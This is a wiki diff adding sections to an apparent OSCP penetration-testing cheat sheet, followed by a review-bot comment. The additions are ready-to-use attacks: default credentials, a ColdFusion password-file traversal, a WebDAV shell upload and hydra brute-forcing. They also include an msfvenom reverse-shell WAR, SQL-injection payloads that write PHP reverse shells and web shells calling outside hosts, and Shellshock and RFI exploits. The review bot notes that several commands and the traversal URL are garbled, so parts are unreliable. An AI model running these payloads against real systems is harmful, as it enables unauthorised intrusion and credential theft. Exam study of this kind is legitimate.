This page shows you the differences between the selected revision and the current version of the page.
oscp_survival_guide [2020/11/25 14:16] M0N5T3R
oscp_survival_guide [2020/11/25 14:39] (current version) M0N5T3R
Line 2754: | Line 2754:
https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh | https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh | ||
+ | RealVNC | ||
+ | RealVNC : https://www.exploit-db.com/exploits/36932 | ||
+ | Edit, BIND_ADDR into mine and BIND_PORT into 4444 | ||
+ | root@kali:~/PWK$python RealVNC-exploit-36932.py | ||
+ | [] Please input an IP address to pwn: 10.11.1.227 | ||
+ | [] Hello From Server: RFB 003.008 | ||
+ | Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del | ||
+ | |||
+ | |||
+ | XAMPP | ||
+ | XAMPP cred(wampp/xampp) | ||
+ | |||
+ | ColdFusion (Vulnerable) | ||
+ | Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl | ||
+ | LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen | ||
+ | (either – neo-security.xml and password.properties) | ||
+ | ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ | ||
+ | exploit/windows/http/coldfusion_fckeditor – only for 8.0.1 | ||
+ | |||
+ | Webdav | ||
+ | WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229 | ||
+ | auxiliary : webdav_test | ||
+ | 1 cadaver http://10.11.x.x/webdav/ | ||
+ | Uploading shells.txt to `shells.txt’ | ||
+ | 1 dav:> put shells.txt | ||
+ | 2 dav:> copy shells.txt shells.asp;.txt | ||
+ | |||
+ | PHPAdmin | ||
+ | http://.../phpmyadmin | ||
+ | db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank) | ||
+ | You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" | ||
+ | |||
+ | Tomcat | ||
+ | Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.209:8080/manager/html | ||
+ | You can upload reverse shell on manager consor ; msfvenom jsp or war file | ||
+ | msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war | ||
+ | jar -xvf shell.war | ||
+ | |||
+ | |||
+ | Windows IIS | ||
+ | Getting Windows 0S and version details through Nikto / Nmap Scanning. | ||
+ | auxiliary/admin/http/iis_auth_bypass | ||
+ | |||
+ | mysql | ||
+ | nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306 | ||
+ | MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac | ||
+ | MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php' | ||
+ | UPLOAD A FILE : | ||
+ | ' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' # | ||
+ | OPEN A PHP SHELL : | ||
+ | ' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE | ||
+ | |||
+ | |||
+ | ShellShock | ||
+ | nikto scan results; shows shellshock on /cgi-bin; use 34900.py | ||
+ | root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234 | ||
+ | [!] Started reverse shell handler | ||
+ | [-] Trying exploit on : /cgi-bin/status" | ||
+ | |||
+ | Squid | ||
+ | proxy scanner/http/squid_pivot_scanning | ||
+ | RHOST : Target | ||
+ | RANGE : Target | ||
+ | RPORT : Squid port | ||
+ | msf auxiliary(scanner/http/squid_pivot_scanning) > run | ||
+ | [+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED | ||
+ | [+] [192.168.88.155] 192.168.88.155:80 seems OPEN | ||
+ | if the target uses squid proxy via 3128 port, use nikto with that proxy setting | ||
+ | nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128" | ||
+ | |||
+ | RFI(Remote File Inclusion) | ||
+ | browse.php?file=http://10.11.0.42/index.html | ||
+ | browse.php?file=ftp://10.11.0.42/index.html | ||
+ | browse.php?expect://ls | ||
+ | |||
+ | Uploading malicious .php file on database | ||
+ | http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html | ||
+ | |||
</code> | </code> |
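Review bot: several commands in this hunk will not run as pasted and should be corrected before anyone relies on the section. The mysql nmap line uses an en-dash in `–script=` where nmap expects `--script=`; the `sh` prefix on the hydra and `mysql -h` lines looks like a leaked code-block language tag rather than part of the command; and the ShellShock (`34900.py`) and `nikto -useproxy` lines end with a stray `"`. The ColdFusion LFI URL is garbled by extraction (ellipsis characters where the traversal sequence should be, and an `en` suffix fused onto `password.properties`), so it should be re-copied from the linked gnucitizen write-up rather than from this page. The doubled `""` quoting in the MySQL `INTO OUTFILE` payloads appears to be a wiki escaping artifact and should be checked against the original source. Minor wording: `passowrd` → `password`, `0S` → `OS`, `browsereg` → `browser`, `consor` → `console`.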